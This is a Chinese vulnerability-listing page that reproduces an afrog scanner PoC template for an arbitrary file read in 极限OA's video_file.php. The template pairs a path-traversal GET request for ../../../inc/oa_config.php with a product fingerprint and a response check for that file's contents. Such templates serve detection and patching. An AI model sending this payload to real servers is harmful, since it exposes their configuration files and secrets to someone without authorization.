jixian-oa-video-file-file-read: 极限OA video_file.php 任意文件读取漏洞

漏洞描述

极限OA video_file.php存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器敏感文件 icon_hash="1967132225"

PoC代码[已公开]

id: jixian-oa-video-file-file-read

info:
  name: 极限OA video_file.php 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |
    极限OA video_file.php存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器敏感文件
    icon_hash="1967132225"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%9E%81%E9%99%90OA/%E6%9E%81%E9%99%90OA%20video_file.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
    expression: response.status == 200 && response.body.bcontains(b'$ROOT_PATH') && response.body.bcontains(b'$ATTACH_PATH')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/jixian-oa-video-file-file-read.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐